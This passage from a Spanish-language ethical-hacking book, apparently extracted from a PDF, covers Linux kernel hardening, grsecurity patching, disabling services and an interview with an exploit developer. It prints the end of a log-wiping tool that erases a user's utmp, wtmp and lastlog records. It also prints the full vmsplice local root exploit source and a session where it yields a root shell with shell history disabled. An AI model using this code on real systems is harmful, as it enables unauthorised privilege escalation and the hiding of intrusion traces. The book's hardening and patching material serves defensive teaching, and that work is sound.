lseek(fd,p->pw_uid*sizeof(struct lastlog),SEEK_SET);write(fd,&ent,sizeof(struct lastlog));close(fd);printf(“Wiped %s from %s.\n”,user,path);return(0);

}

main(argc,argv)int argc;char *argv[];{

char f_utmp[MAX_FPATH],f_utmpx[MAX_FPATH];char f_wtmp[MAX_FPATH],f_wtmpx[MAX_FPATH];char f_lastlog[MAX_FPATH];struct utsname utname;int lastlog_type;

if (argc!=2){printf(“Usage: %s Usernane\n”,argv[0]);

263

O fallo de segmentación, es cuando un programa intenta acceder a un segmento de memoria

que no le fue asignado por el sistema. Cuando sucede esto (inducido por un atacante o gene-

rado por error), suele generar archivos core (volcados) y estos pueden ser analizados con GDB

para ver cual fue el problema. keys: core dumps, segmentation fault, debugging.

CORE DUMPED

Hacking Etico - [PDF Document] (267)

exit(1);}if (getpwnam(argv[1])==NULL){

printf(“Unknown user : %s\n”,argv[1]);exit(1);

}uname(&utname);strcpy(f_wtmpx,””); strcpy(f_utmpx,””);

if (!strcmp(utname.sysname,”SunOS”)){#ifdef UTMPX

strcpy(f_utmp, SVR4_UTMP);strcpy(f_wtmp, SVR4_WTMP);strcpy(f_utmpx, UTMPX_FILE);strcpy(f_wtmpx, WTMPX_FILE);strcpy(f_lastlog, SVR4_LASTLOG);lastlog_type=0;

#elsestrcpy(f_utmp, SUNOS4_UTMP);strcpy(f_wtmp, SUNOS4_WTMP);strcpy(f_lastlog, SUNOS4_LASTLOG);lastlog_type=0;

#endif}else if (!strcmp(utname.sysname,”Linux”)

|| !strcmp(utname.sysname,”FreeBSD”)){strcpy(f_utmp, BSD_UTMP);strcpy(f_wtmp, BSD_WTMP);strcpy(f_lastlog, BSD_LASTLOG);

}else if (!strcmp(utname.sysname,”IRIX”)){#ifdef UTMPX

strcpy(f_utmp, SVR4_UTMP);

264

Si vamos a manejar archivos o datos sensibles por Internet o si los vamos a dejar enun servidor con acceso a Internet, es recomendable utilizar GnuPG (www.gnupg.org).Esta utilidad es el equivalente a PGP (herramienta de cifrado muy útil), pero para pla-taformas Linux.

Cifrado de correo y archivos en Linux

Hacking Etico - [PDF Document] (268)

strcpy(f_wtmp, SVR4_WTMP);strcpy(f_utmpx, UTMPX_FILE);strcpy(f_wtmpx, WTMPX_FILE);strcpy(f_lastlog, SVR4_LASTLOG);lastlog_type=1;

#elseprintf(“Can not wipe. System Unknown.\n”);

#endif}else

printf(“Can not wipe. System Unknown.\n”);

wipe_log(f_utmp, argv[1],0);wipe_log(f_utmpx,argv[1],1);wipe_log(f_wtmp, argv[1],0);wipe_log(f_wtmpx,argv[1],1);wipe_lastlog(f_lastlog,argv[1],lastlog_type);

}

Si queremos testear más zappers o ver su código para adecuarlo a un objetivo y ha-cer las pruebas necesarias para protegernos mejor, podemos buscar palabras clave co-mo log cleaners o log zappers en www.packetstormsecurity.org y www.google.com.

Gui. Interfaz gráfica de KSystemlog para KDE que muestralos logs de sistema y aplicaciones para monitorearlos. Podemos ver suscaracterísticas y descargarlo en http://ksystemlog.forum-software.org.

265

Hacking Etico - [PDF Document] (269)

Ejemplo de hardening en el núcleo (kernel)

Hace muy poco, en Milw0rm se publicó un exploit local para el kernel de Linux(www.milw0rm.com/exploits/5092).

/** jessica_biel_naked_in_my_bed.c** Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.* Stejnak je to stare jak cyp a aj jakesyk rozbite.** Linux vmsplice Local Root Exploit* By qaaz** Linux 2.6.17 - 2.6.24.1*

* This is quite old code and I had to rewrite it to even compile.* It should work well, but I don’t remeber original intent of all* the code, so I’m not 100% sure about it. You’ve been warned ;)** -static -Wno-format*/

#define _GNU_SOURCE#include <stdio.h>#include <errno.h>#include <stdlib.h>#include <string.h>#include <malloc.h>#include <limits.h>#include <signal.h>#include <unistd.h>#include <sys/uio.h>#include <sys/mman.h>#include <asm/page.h>#define __KERNEL__#include <asm/unistd.h>

266

Hacking Etico - [PDF Document] (270)

#define PIPE_BUFFERS 16#define PG_compound 14#define uint unsigned int#define static_inline static inline __attribute__((always_inline))#define STACK(x) (x + sizeof(x) - 40)

struct page {unsigned long flags;int count;int mapcount;unsigned long private;void *mapping;unsigned long index;struct { long next, prev; } lru;

};

void exit_code();char exit_stack[1024 * 1024];

void die(char *msg, int err){

printf(err ? “[-] %s: %s\n” : “[-] %s\n”, msg, strerror(err));fflush(stdout);fflush(stderr);exit(1);

}

#if defined (__i386__)

#ifndef __NR_vmsplice#define __NR_vmsplice 316#endif

#define USER_CS 0x73#define USER_SS 0x7b#define USER_FL 0x246

static_inline

267

Hacking Etico - [PDF Document] (271)

void exit_kernel(){

__asm__ __volatile__ (“movl %0, 0x10(%%esp) ;”“movl %1, 0x0c(%%esp) ;”“movl %2, 0x08(%%esp) ;”“movl %3, 0x04(%%esp) ;”

“movl %4, 0x00(%%esp) ;”“iret”: : “i” (USER_SS), “r” (STACK(exit_stack)), “i” (USER_FL),

“i” (USER_CS), “r” (exit_code));

}

static_inlinevoid * get_current(){

unsigned long curr;__asm__ __volatile__ (“movl %%esp, %%eax ;”“andl %1, %%eax ;”

“movl (%%eax), %0”: “=r” (curr): “i” (~8191));return (void *) curr;

}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice#define __NR_vmsplice 278#endif

#define USER_CS 0x23#define USER_SS 0x2b#define USER_FL 0x246

268

Hacking Etico - [PDF Document] (272)

static_inlinevoid exit_kernel(){

__asm__ __volatile__ (“swapgs ;”“movq %0, 0x20(%%rsp) ;”“movq %1, 0x18(%%rsp) ;”“movq %2, 0x10(%%rsp) ;”

“movq %3, 0x08(%%rsp) ;”“movq %4, 0x00(%%rsp) ;”“iretq”: : “i” (USER_SS), “r” (STACK(exit_stack)), “i” (USER_FL),

“i” (USER_CS), “r” (exit_code));

}

static_inlinevoid * get_current(){

unsigned long curr;__asm__ __volatile__ (“movq %%gs:(0), %0”: “=r” (curr)

);return (void *) curr;

}

#else#error “unsupported arch”#endif

#if defined (_syscall4)#define __NR__vmsplice __NR_vmsplice_syscall4(

long, _vmsplice,int, fd,struct iovec *, iov,

269

Hacking Etico - [PDF Document] (273)

unsigned long, nr_segs,unsigned int, flags)

#else#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))#endif

static uint uid, gid;

void kernel_code(){

int i;uint *p = get_current();

for (i = 0; i < 1024-13; i++) {if (p[0] == uid && p[1] == uid &&

p[2] == uid && p[3] == uid &&p[4] == gid && p[5] == gid &&p[6] == gid && p[7] == gid) {

p[0] = p[1] = p[2] = p[3] = 0;p[4] = p[5] = p[6] = p[7] = 0;p = (uint *) ((char *)(p + 8) + sizeof(void *));p[0] = p[1] = p[2] = ~0;break;

}p++;

}

exit_kernel();}

void exit_code(){

if (getuid() != 0)die(“wtf”, 0);

printf(“[+] root\n”);putenv(“HISTFILE=/dev/null”);

270

Hacking Etico - [PDF Document] (274)

execl(“/bin/bash”, “bash”, “-i”, NULL);die(“/bin/bash”, errno);

}

int main(int argc, char *argv[]){

int pi[2];size_t map_size;char * map_addr;struct iovec iov;

struct page * pages[5];

uid = getuid();gid = getgid();setresuid(uid, uid, uid);setresgid(gid, gid, gid);

printf(“—————————————————-\n”);printf(“ Linux vmsplice Local Root Exploit\n”);printf(“ By qaaz\n”);printf(“—————————————————-\n”);

if (!uid || !gid)die(“!@#$”, 0);

/*****/pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};pages[1] = pages[0] + 1;

map_size = PAGE_SIZE;map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,

MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);if (map_addr == MAP_FAILED)

die(“mmap”, errno);

memset(map_addr, 0, map_size);printf(“[+] mmap: 0x%lx .. 0x%lx\n”, map_addr, map_addr + map_size);printf(“[+] page: 0x%lx\n”, pages[0]);printf(“[+] page: 0x%lx\n”, pages[1]);

271

Hacking Etico - [PDF Document] (275)

pages[0]->flags = 1 << PG_compound;pages[0]->private = (unsigned long) pages[0];pages[0]->count = 1;pages[1]->lru.next = (long) kernel_code;

/*****/pages[2] = *(void **) pages[0];pages[3] = pages[2] + 1;

map_size = PAGE_SIZE;

map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

if (map_addr == MAP_FAILED)die(“mmap”, errno);

memset(map_addr, 0, map_size);printf(“[+] mmap: 0x%lx .. 0x%lx\n”, map_addr, map_addr + map_size);printf(“[+] page: 0x%lx\n”, pages[2]);printf(“[+] page: 0x%lx\n”, pages[3]);

pages[2]->flags = 1 << PG_compound;pages[2]->private = (unsigned long) pages[2];pages[2]->count = 1;pages[3]->lru.next = (long) kernel_code;

/*****/pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};map_size = PAGE_SIZE;map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,

272

En www.sans.org/reading_room/whitepapers/linux/2059.php, podemos encontrar undocumento, confeccionado por Alexandre Déry para SANS, acerca del hardening enDebian 4.0. Está relacionado con la instalación, con cuentas de usuarios, con aplicacio-nes que están de más, con la red y el mantenimiento.

Hardening de Debian

Hacking Etico - [PDF Document] (276)

MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);if (map_addr == MAP_FAILED)

die(“mmap”, errno);memset(map_addr, 0, map_size);printf(“[+] mmap: 0x%lx .. 0x%lx\n”, map_addr, map_addr + map_size);printf(“[+] page: 0x%lx\n”, pages[4]);

/*****/map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,

MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

if (map_addr == MAP_FAILED)die(“mmap”, errno);

memset(map_addr, 0, map_size);printf(“[+] mmap: 0x%lx .. 0x%lx\n”, map_addr, map_addr + map_size);

/*****/map_size -= 2 * PAGE_SIZE;if (munmap(map_addr + map_size, PAGE_SIZE) < 0)

die(“munmap”, errno);

/*****/if (pipe(pi) < 0) die(“pipe”, errno);close(pi[0]);

iov.iov_base = map_addr;iov.iov_len = ULONG_MAX;

signal(SIGPIPE, exit_code);_vmsplice(pi[1], &iov, 1, 0);

die(“vmsplice”, errno);return 0;

}

Lo testeamos en un Debian 4.0, es decir, la última versión de esta distribución, ins-talada por defecto en un servidor de pruebas, y logramos elevar los privilegios aroot en segundos:

273

Hacking Etico - [PDF Document] (277)

test@lab:~$ vi c.c - Pego el exploittest@lab:~$ gcc c.c -o c - Lo compilotest@lab:~$ uname –a - Muestro la version actual del kernelLinux lab 2.6.18-5-686 #1 SMP Mon Dec 24 16:41:07 UTC 2007 i686 GNU/Linuxtest@lab:~$ ./c - Lo ejecuto—————————————————-Linux vmsplice Local Root ExploitBy qaaz

—————————————————-[+] mmap: 0x0 .. 0x1000

[+] page: 0x0[+] page: 0x20[+] mmap: 0x4000 .. 0x5000[+] page: 0x4000[+] page: 0x4020[+] mmap: 0x1000 .. 0x2000[+] page: 0x1000[+] mmap: 0xb7e0c000 .. 0xb7e3e000[+] rootroot@lab:~# whoami - Vemos quienes somosrootroot@lab:~# id - Vemos el privilegio (root) obtenidouid=0(root) gid=0(root) grupos=20(dialout),24(cdrom),25(floppy),29(audio),

44(video),46(plugdev),106(netdev),109(powerdev),1000(lab)root@lab:~# cat /etc/issue - Vemos la version de la plataformaDebian GNU/Linux 4.0 \n \l

¿Cómo podría lidiar con este tipo de cosas un administrador dedicado?

• Estando suscripto en el mailing de http://vger.kernel.org para enterarse de unanueva release o versión de kernel disponible y actualizarlo al instante.

• Estar dado de alta en listas como Bugtraq y similares para enterarse de las fallasy mitigarlas rápidamente.

• Quizás, contar con un parche adicional previamente instalado (no sólo de actua-lización) para el kernel del servidor Linux, como Grsec (www.grsecurity.net) y es-tar dado de alta en su lista de correo (www.grsecurity.net/pipermail).

274

Hacking Etico - [PDF Document] (278)

Fix. Parche para el kernel de Linux 2.0* 2.2* 2.4*perteneciente al proyecto Openwall. Le da una mayor seguridad

al kernel y puede encontrarse en la página www.openwall.com/linux.

Veamos entonces cómo actualizar con facilidad ese kernel y luego patchearlo. Prime-ro descargamos la imagen .deb de la última version desde el sitio http://ftp.debia-n.org/debian/pool/main/l/linux-2.6/ y luego ejecutamos en la consola de coman-dos:

lab:# dpkg -i linux-image-2.6.24-1-686_2.6.24-4_i386.debSeleccionando el paquete linux-image-2.6.24-1-686 previamente no seleccionado.(Leyendo la base de datos ...103559 ficheros y directorios instalados actualmente.)Desempaquetando linux-image-2.6.24-1-686 (de linux-image-2.6.24-1-686

_2.6.24-4_i 386.deb) ...Done.Configurando linux-image-2.6.24-1-686 (2.6.24-4) ...Running depmod.

Finding valid ramdisk creators.Using mkinitramfs-kpkg to build the ramdisk.Running postinst hook script update-grub.Searching for GRUB installation directory ... found: /boot/grubSearching for default file ... found: /boot/grub/defaultTesting for an existing GRUB menu.lst file ... found: /boot/grub/menu.lstSearching for splash image ... none found, skipping ...

275

Hacking Etico - [PDF Document] (279)

Found kernel: /boot/vmlinuz-2.6.24-1-686Found kernel: /boot/vmlinuz-2.6.18-6-686Found kernel: /boot/vmlinuz-2.6.18-5-686Updating /boot/grub/menu.lst ... done

Recordemos que hay que retocar el código fuente del archivomenu.lst si tenemos unsistema multiboot, ya que este proceso de actualización lo modificará automaticamen-te. Una vez que reiniciamos y establecemos otra sesion en la shell, trataremos de eje-cutar nuevamente el exploit local de antes. Como veremos, no tendrá el mismo efec-to esta vez. El Kernel anterior era version 2.6.18 y éste es el último a la fecha, el 2.6.24.

test@lab:~$ uname -aLinux lab 2.6.24-1-686 #1 SMP Mon Feb 11 14:37:45 UTC 2008 i686 GNU/Linuxtest @lab:~$ gcc -o c c.ctest @lab:~$ ./c—————————————————-Linux vmsplice Local Root Exploit

By qaaz—————————————————-[+] mmap: 0x0 .. 0x1000[+] page: 0x0[+] page: 0x20[+] mmap: 0x4000 .. 0x5000

[+] page: 0x4000[+] page: 0x4020[+] mmap: 0x1000 .. 0x2000[+] page: 0x1000[+] mmap: 0xb7d7f000 .. 0xb7db1000[-] vmsplice: Bad address

test @lab:~$ - Esta vez no funcionó, ya que está actualizado el kernel.

Ahora bien, ¿puede prevenirse una elevación de privilegios en esta nueva y última ver-sion si en algún momento se le descubre una vulnerabilidad?Sí, tecnicamente de modo local: actuando proactivamente con la aplicación del parcheGrsec al núcleo. Veamos algunas de sus características:

276

Hacking Etico - [PDF Document] (280)

• Sistema robusto e inteligente basado en Role-Based Access Control (RBAC) quepuede generar políticas de mínimos privilegios para el sistema completo sin con-figuración alguna.

• Hardening del Chroot.• Extensamente auditado.• Prevención de ejecucion de código arbitrario más allá de la técnica utilizada (stack

smashing, heap corruption, etcétera).• Prevención de ejecución de código arbitrario en el kernel.• Randomización del stack, librería y heap bases.• Randomización Kernel stack base.• Protección contra null-pointer bugs en el kernel.• Reducción del riesgo de información sensitiva mostrada a través de bugs del ker-

nel.• Restricción para que los usuarios vean sólo sus procesos.• Alertas de seguridad y auditorias con la direccion IP de la persona que causó el aler-

ta.

Parche. En el sitio de grsecurity podemos obtener más información sobre su parche.

Es importante saber que manipular el kernel de Linux sin conocimiento o con-ciencia puede llevar a la inutilización del sistema, por lo que no es conveniente rea-lizar este tipo de patcheo directamente sobre servidores en producción (aquellos

277

Hacking Etico - [PDF Document] (281)

que están trabajando), sino en servidores de prueba. Además, tampoco debemos bo-rrar la imagen de arranque anterior ya que, en caso de aparecer problemas al reiniciarcon el nuevo kernel patcheado, podemos relinkearlo desde el arrancador (Grub porejemplo). Es muy útil usar el foro de Grsec para aclarar dudas específicas, y debemostratar de que el patch sea el correcto para el kernel (misma versión) y comprobar elseteo de los ítems en el menú de forma adecuada, según nuestras necesidades.Veamos cómo aplicar el parche Grsec a nuestro último kernel.

lab@terminal:~$ su - Logueamos como usuario rootPassword:terminal:# cd /usr/src - Vamos al path /usr/srcterminal:/usr/src# wget http://www.grsecurity.net/test/grsecurity-2.1.11-2

.6.24.4-200803251800.patch - Bajamos el patch—21:08:26— http://www.grsecurity.net/test/grsecurity-2.1.11-2.6.24

.4-20080325 1800.patch

=> `grsecurity-2.1.11-2.6.24.4-200803251800.patch’Resolviendo www.grsecurity.net... 209.9.226.146Connecting to www.grsecurity.net|209.9.226.146|:80... conectado.Petición HTTP enviada, esperando respuesta... 200 OKLongitud: 1.170.308 (1.1M) [text/plain]

100%[====================================>] 1.170.308 98.24K/s ETA 00:00

21:08:41 (77.89 KB/s) - `grsecurity-2.1.11-2.6.24.4-200803251800.patch’saved [1 170308/0470308]

terminal:/usr/src# wget http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.24.4.tar.bz2

- Bajamos el ultimo kernel

—21:09:26— http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.24.4.tar.bz2

=> `linux-2.6.24.4.tar.bz2’Resolviendo www.kernel.org... 204.152.191.37, 204.152.191.5Connecting to www.kernel.org|204.152.191.37|:80... conectado.Petición HTTP enviada, esperando respuesta... 200 OKLongitud: 46.737.783 (45M) [application/x-bzip2]

278

Hacking Etico - [PDF Document] (282)

100%[=======================================================================

==>] 46.737.783 115.04K/s ETA 00:00021:18:23 (85.19 KB/s) - `linux-2.6.24.4.tar.bz2’ saved [46737783/46737783]

terminal:/usr/src# tar xjf linux-2.6.24.4.tar.bz2- Descomprimimosterminal:/usr/src# ln -s linux-2.6.24.4 linux- Hacemos un link al path linuxterminal:/usr/src# cd linux- Ingresamos al pathterminal:/usr/src/linux# patch -p1<../grsecurity-2.1.11-2.6.24

.4-200803251800.patch

terminal:/usr/src/linux# cp /boot/config-2.6.24-1-686 .configterminal:/usr/src/linux# make menuconfig

terminal:/usr/src/linux# make-kpkg clean

terminal:/usr/src/linux# make-kpkg —revision=custom.1.0 kernel_image -Estogenerara el archivo .deb para instalar con la nueva configuracion de kernel

terminal:/usr/src# ls -altotal 65616drwxrwsr-x 3 root root 4096 2008-03-25 23:44 .drwxr-xr-x 12 root root 4096 2008-03-25 21:39 ..-rw-r—r— 1 root root 1170308 2008-03-25 14:56 grsecurity-2.1.11-2.6.24

.4-200803251800.patchlrwxrwxrwx 1 root root 12 2008-03-25 21:20 linux -> linux-2.6.24.4drwxr-xr-x 23 root root 4096 2008-03-25 23:44 linux-2.6.24.4-rw-r—r— 1 root root 46737783 2008-01-24 20:16 linux-2.6.24.4.tar.bz2-rw-r—r— 1 root root 19185030 2008-03-25 23:44 linux-image-2.6.24.4-grsec

_custom.1.0_i386.deb

terminal:/usr/src# dpkg -i linux-image-2.6.24.4-grsec_custom.1.0_i386.deb- Instala el paquete

Seleccionando el paquete linux-image-2.6.24.4-grsec previamente noseleccionado.

(Leyendo la base de datos ...106514 ficheros y directorios instalados actualmente.)

279

Hacking Etico - [PDF Document] (283)

Desempaquetando linux-image-2.6.24.4-grsec (de linux-image-2.6.24.4-grsec_custom.1.0_i386.deb) ...

Done.Configurando linux-image-2.6.24.4-grsec (custom.1.0) ...Running depmod.Running postinst hook script /sbin/update-grub.You shouldn’t call /sbin/update-grub. Please call /usr/sbin/update

-grub instead!

Searching for GRUB installation directory ... found: /boot/grubSearching for default file ... found: /boot/grub/defaultTesting for an existing GRUB menu.lst file ... found: /boot/grub/menu.lstSearching for splash image ... none found, skipping ...Found kernel: /boot/vmlinuz-2.6.24-grsecFound kernel: /boot/vmlinuz-2.6.18-6-686Updating /boot/grub/menu.lst ... done

terminal:/boot# apt-get install initrd-toolsLeyendo lista de paquetes... HechoCreando árbol de dependencias... HechoSe instalarán los siguientes paquetes extras:

cramfsprogs dashSe instalarán los siguientes paquetes NUEVOS:

cramfsprogs dash initrd-tools0 actualizados, 3 se instalarán, 0 para eliminar y 0 no actualizados.Necesito descargar 140kB de archivos.Se utilizarán 492kB de espacio de disco adicional después de desempaquetar.¿Desea continuar [S/n]? sDes:1 ftp://ftp.us.debian.org etch/main dash 0.5.3-7 [86,0kB]Des:2 ftp://ftp.us.debian.org etch/main cramfsprogs 1.1-6 [21,3kB]

280

Si al ejecutar el comando make-kpkg, aparece un cartel de error bash que dice make-kpkg: command not found, debemos ejecutar apt-get install kernel-package para podercontinuar. Ésta es la penúltima instancia en la que, una vez generado el paquete de ins-talación, se le aplica al sistema.

Error

Hacking Etico - [PDF Document] (284)

Des:3 ftp://ftp.us.debian.org etch/main initrd-tools 0.1.84.2 [32,2kB]Descargados 140kB en 9s (14,4kB/s)Preconfigurando paquetes ...

Seleccionando el paquete dash previamente no seleccionado.(Leyendo la base de datos ...108935 ficheros y directorios instalados actualmente.)Desempaquetando dash (de .../archives/dash_0.5.3-7_i386.deb) ...Seleccionando el paquete cramfsprogs previamente no seleccionado.Desempaquetando cramfsprogs (de .../cramfsprogs_1.1-6_i386.deb) ...Seleccionando el paquete initrd-tools previamente no seleccionado.Desempaquetando initrd-tools (de .../initrd-tools_0.1.84.2_all.deb) ...Configurando dash (0.5.3-7) ...

Configurando cramfsprogs (1.1-6) ...Configurando initrd-tools (0.1.84.2) ...

terminal:/boot# mkinitrd -o /boot/initrd.img-2.6.24.4-grsec 2.6.24.4-grsec

Menú. Éste es el menú que se presenta apenas ejecutemosel comando make menuconfig desde la consola. Desde aquíse seleccionarán las características por incluir en el kernel

para que éste las soporte una vez que esté en funcionamiento.

Ahora sí, sólo resta linkear /boot/initrd.img-2.6.24.4-grsec enmenu.lst de Grub yreiniciar el sistema. Al finalizar, tendremos un kernel actualizado a la última versióny patcheado con un alto nivel de seguridad adicional.

281

Hacking Etico - [PDF Document] (285)

Menu2. Dentro del menú Security Options del kernel seencuentran las opciones de Grsec. Es importante seleccionar un nivel

medium (o menor) para que no interrumpa la performance general del servidor.

Ejemplo de Hardening en servicios

En un servidor, es fundamental deshabilitar servicios (cerrar puertos) inútiles pa-ra incrementar la seguridad en él. Como Linux es un sistema operativo muy ver-satil, existen variadas formas de hacerlo. Veremos un modo adecuado y otro me-nos sutil, pero eficaz. En primer lugar, escaneamos nuestra propia máquina paraver los servicios que corren:

terminal:/# nmap –sS localhost

Starting Nmap 4.53 ( http://insecure.org ) at 2008-03-13 05:47 ARTInteresting ports on localhost (127.0.0.1):Not shown: 1710 closed portsPORT STATE SERVICE25/tcp open smtp111/tcp open rpcbind113/tcp open auth631/tcp open ipp1241/tcp open nessus

Con la ayuda del comando lsof –i(numero de puerto), por ejemplo lsof –i:113, nosdirá cuál es el archivo o aplicación que genera ese servicio para poder deshabilitar-lo. De ese modo, podríamos conocer el archivo binario y ejecutar, de modo no su-til, los comandos que nos permitirán cerrar todos los puertos.

282

Hacking Etico - [PDF Document] (286)

# mv /usr/sbin/exim4 /usr/sbin/exim4-disable# mv /usr/sbin/cupsd /usr/sbin/cupsd-disable# mv /etc/init.d/portmap /etc/init.d/portmap-disable# shutdown –r now# killall nessusd (deshabilitado momentaneamente)# nmap localhost

Starting Nmap 4.53 ( http://insecure.org ) at 2008-03-27 04:46 ARTAll 1714 scanned ports on localhost (127.0.0.1) are closed

Nmap done: 1 IP address (1 host up) scanned in 0.248 seconds

Una forma más correcta de deshabilitar servicios que se inician con el booteo, co-mo por ejemplo el servicio bittorrent, es la que vemos a continuación:

terminal:/etc/init.d# update-rc.d -f bittorrent removeRemoving any system startup links for /etc/init.d/bittorrent ...

/etc/rc0.d/K20bittorrent/etc/rc1.d/K20bittorrent/etc/rc2.d/S20bittorrent/etc/rc3.d/S20bittorrent/etc/rc4.d/S20bittorrent/etc/rc5.d/S20bittorrent/etc/rc6.d/K20bittorrent

De la misma forma, deberíamos hacer con cada uno de los servicios que no desea-mos que se inicie al arrancar la máquina. Además, recordemos escanear nuestrohost para ver la totalidad de sus puertos del siguiente modo: nmap –sS –p 1-65365localhost. Seguramente, encontraremos servicios para deshabilitar.

283

El sitio http://elladodelmal.blogspot.com (mantenido por José María “Chema” Alonso,ingeniero profesional de la seguridad y la administración) es un sitio interesante paravisitar, ya que en él encontraremos retos, notas, comentarios y cosas interesantes re-lacionadas con el hacking ético.

Sitio sobre hacking ético

Hacking Etico - [PDF Document] (287)

Plataforma. W3af, Web Application Attack and Audit Framework, es una plataformapara el testeo de aplicaciones. Podemos probarla bajándola de http://w3af.sourceforge.net.

5 preguntas a un desarrollador de exploits

Jonathan Sarba, CEO y fundador de la empresa Shellcode IT Solutions & Secu-rity Research (www.shellcode.com.ar), nos responde algunas consultas relaciona-das con los exploits.

¿Qué técnicas de explotación se pueden llevar a cabo con los conocimien-tos suficientes de shellcoding o exploit development en un entorno Linux,ya sea remoto o local? El fin: elevar privilegios a root.Dependerá mucho de la distribución de Linux existente y de las versiones de soft-ware de base. Son muchas las técnicas aplicables, por eso yo comenzaría por estu-diar alguna de las técnicas de protección conocidas.

284

Zero Day Initiative (www.zerodayinitiative.com) es una empresa que alienta a los inves-tigadores de vulnerabilidades a vender sus hallazgos (exploits) y los coloca en una lis-ta en la que, de acuerdo con su categoría, les retribuye determinado dinero por sus có-digos fuente.

ZDI

Hacking Etico - [PDF Document] (288)

• randomization stack• non-executable stack• malloc protection• library randomization• environment protectionLa realidad es que, dependiendo del mercado corporativo donde encuentres la pla-taforma Linux, podrás tener, incluso, menores protecciones que ésas.

Shellcode. En el sitio de Shellcode podemos encontrar información acerca de los serviciosy productos que ofrecen, además de material de estudio.

¿Podrías contarnos, en pocas palabras, cómo aprovechar el Segmentationfault (core dumped) generado en aquellos archivos uid0 encontrados en unashell?Aunque un segfault nos resulte atractivo, cuando se trata de un archivo que poseeel bit setUID y su propietario es root(0) o un usuario de algún servicio interesante(postifx, Apache, etcétera); las protecciones de contexto de ejecución en el kernel,y la forma de linkeo y compilado de binarios hacen la cosa bastante complicada.Y yendo a la respuesta concreta, tienes una sola opción para aprovechar un segfault(hablando de UNIX/Linux y siendo un bug no reportado): sacarse la cáscara de in-geniero, darle una visión diferente y aplicar conocimientos sobre ingeniería inver-sa, ASM, C, sistemas operativos, señales y comunicación entre procesos.

285

Hacking Etico - [PDF Document] (289)

Ya recomendamos el parche Grsec luego de poner up-to-date el kernel.¿Qué otra medida de hardening para el núcleo piensas que deberían cono-cer?Creo que tanto el parche GRSEC como su variante OpenWall cubren los más im-portantes riesgos, y, si sumamos consideraciones sobre los módulos del kernel,protegeríamos una gran parte de los potenciales caminos que puede encontrar unintruso para escalar privilegios e infectar el sistema. De todas formas, es importan-te saber que no debemos olvidar buenas políticas de control de acceso, seguridadde datos; y establecer una correcta administración de los servicios del sistema y lainteracción de sus recursos (humanos incluidos).

Certificación. Certificación denominada CertifiedExpert Penetration Tester (CEPT) de Information Assurance

Certification Review Board. Su sitio web es www.iacertification.org.

¿Cuáles son los rootkits o backdoors (del tipo SucKit o no) más interesantesque conoces?El control (por un administrador de administradores) en un sistema operativo, con-siderando la actual integración entre diversos sistemas, puede ser muy complicadode volver atrás. He visto muchos casos en los que una infección del tipo SUCKITo ADORE fue mucho más fácil de detectar que la infección de algunos simples bi-narios (estilo t0rnkit); el contexto define muchas cosas.Creo también que la popularidad sobre la técnica de HOOKING de SYSCALLS

286

Hacking Etico - [PDF Document] (290)

(UNIX/Linux) o APIS (WINDOWS) marcó un antes y un después; y sin dudas,me preocuparía más sobre este tipo de infección por el impacto que tienen, peroapuntaría inicialmente a rootkits de módulos (estilo ADORE).Hay una lista larga de rootkits con particularidades de WORM que no hace faltaenunciar (el proyecto www.chkrootkit.org tiene muchos).

Si tuvieras que recomendar los primeros libros y whitepapers para que unlector interesado en comenzar a desarrollar exploits (remotos/locales) iniciesu carrera de estudio o investigación, ¿cuáles serían estos?

Sin duda, SHELLCODER´s handbook 1.ª y 2.ª edición son recomendables; tam-bién es muy bueno Secrets of Reverse engineering. Hay una serie de libros en estalínea que resultan muy interesantes y son realmente útiles para utilizarlos como ma-chetes.Igualmente, hay mucho material dando vueltas en Internet (nuestra web tiene unapequeña selección http://goodfellas.shellcode.com.ar). Además, los papers de laPHRACK; NGSSoftware tiene muy buenos papers, y hay algunos especialistas queescriben siempre y vale la pena leerlos.

Reingenieria. En este sitio se pone a disposición un documento que explica como es posible

rapidamente hacer ingenieria inversa sobre un parche para desarrollar un exploit para la falla en

cuestión: www.cs.cmu.edu/~dbrumley/pubs/apeg.pdf

287

Hacking Etico - [PDF Document] (291)

288

Ksplice. Documento del MIT en donde se habla de Ksplice, un sistema para laactualización del kernel de linux sin reiniciar el sistema.

http://web.mit.edu/ksplice/doc/ksplice.pdf o web.mit.edu/ksplice/doc/

Hacking Etico - [PDF Document] (292)

9 > Algunosconceptosfinales

En este capítulo centramos el contenido en

cuatro cuestiones fundamentales relacionadas

con la gestión de la seguridad de la

organización, las técnicas avanzadas de

hacking, los errores más comunes cometidos

por los supuestos profesionales de la

seguridad y todo lo referido a las

normativas de las organizaciones.

Hacking Etico - [PDF Document] (293)

EL HACKING FÍSICOSe llama así al acto de estar frente al servidor o terminal interna, con las manospuestas sobre la máquina desde la que el intruso intenta comprometer a laorganización y, sin permiso apropia, desvía, copia, destruye o altera información dela misma, estando en un recinto u otro componente del escenario o del sistema deinformación en persona.Esto se da a diario en las organizaciones, generalmente con empleados desconten-tos, personal externo contratado, vendedores de información, aquellos que cum-plen roles de espías industriales u otros ligados a inteligencia.La implementación de seguridad física se realiza a través de mecanismos de con-trol y soluciones para minimizar este tipo de riesgo (entre otros que provienen dela naturaleza, existen sabotajes, incendios, y otros que atentan al hardware comoel robo, etcétera).

Planos. Un peluquero en Alemania encontró los planos delBundesbank, que había gastado 221 millones de dólares en su

renovación estructural . Éstos incluían información acerca de detectores, rejas, pisosy pasillos. Una representante del banco dijo que aún no saben cómo llegaron

los planos allí y que es imposible que alguien haya comprometido su seguridad física.

